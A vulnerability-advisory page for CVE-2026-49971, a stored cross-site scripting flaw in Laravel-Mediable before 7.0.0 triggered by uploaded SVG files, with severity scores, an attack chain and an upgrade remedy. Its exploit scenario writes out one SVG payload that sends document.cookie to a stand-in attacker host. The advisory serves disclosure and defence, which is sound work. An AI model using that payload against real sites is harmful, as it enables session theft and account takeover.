Skip to main content

Laravel-Mediable CVE-2026-49971

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-13 VulnCheck
5.3
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
5.3 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network upload path needs no auth (PR:N); victim must open SVG (UI:R); XSS changes scope to victim browser (S:C) with limited cookie/CSRF impact (C:L/I:L).

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jul 13, 2026 - 19:45 vuln.today
Analysis Generated
Jul 13, 2026 - 19:45 vuln.today

DescriptionCVE.org

Laravel-Mediable before 7.0.0 contains a stored cross-site scripting vulnerability that allows authenticated or anonymous users to execute arbitrary JavaScript by uploading unsanitized SVG files containing embedded scripts in onload event handlers, script tags, or foreignObject elements. Attackers can store persistent XSS payloads in uploaded SVG files that execute with full DOM access when victims open or preview the file, enabling session cookie theft, CSRF token capture, and account takeover.

AnalysisAI

Stored XSS in Laravel-Mediable before 7.0.0 allows network-accessible, unauthenticated attackers to persist malicious JavaScript payloads by uploading crafted SVG files containing embedded scripts in onload handlers, script tags, or foreignObject elements. When any authenticated user subsequently opens or previews a poisoned file in their browser, the payload executes with full DOM access, enabling session cookie theft, CSRF token capture, and complete account takeover. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Upload crafted SVG with embedded JavaScript to application
Delivery
File stored on server without sanitization
Exploit
Attacker or application surfaces file link to victim
Install
Victim opens or previews SVG inline in browser
C2
Browser executes embedded script in victim's session context
Execute
Session cookies and CSRF tokens exfiltrated to attacker
Impact
Account takeover using stolen credentials

Vulnerability AssessmentAI

Exploitation Exploitation requires three concrete conditions to align: (1) the target application uses Laravel-Mediable before 7.0.0; (2) the application permits upload of SVG files (either by anonymous or authenticated users - the description and PR:N metric confirm no privilege prerequisite for the upload step); and (3) the application or a feature within it renders stored SVG files inline in a browser context rather than forcing file download, causing the browser to parse and execute embedded scripts. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.3 (Medium) with vector AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N accurately characterises this as a stored XSS affecting the subsequent system (victim browser) rather than the server itself, with limited per-victim confidentiality and integrity impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker submits an SVG file containing the payload <svg xmlns='http://www.w3.org/2000/svg' onload='fetch("https://attacker.example/c?s="+document.cookie)'></svg> to a publicly accessible upload endpoint - no account required if anonymous uploads are permitted. The file is stored unmodified on the server. …
Remediation Upgrade Laravel-Mediable to version 7.0.0, which the vendor has explicitly designated a security release and for which upgrade is strongly recommended. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-49971 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy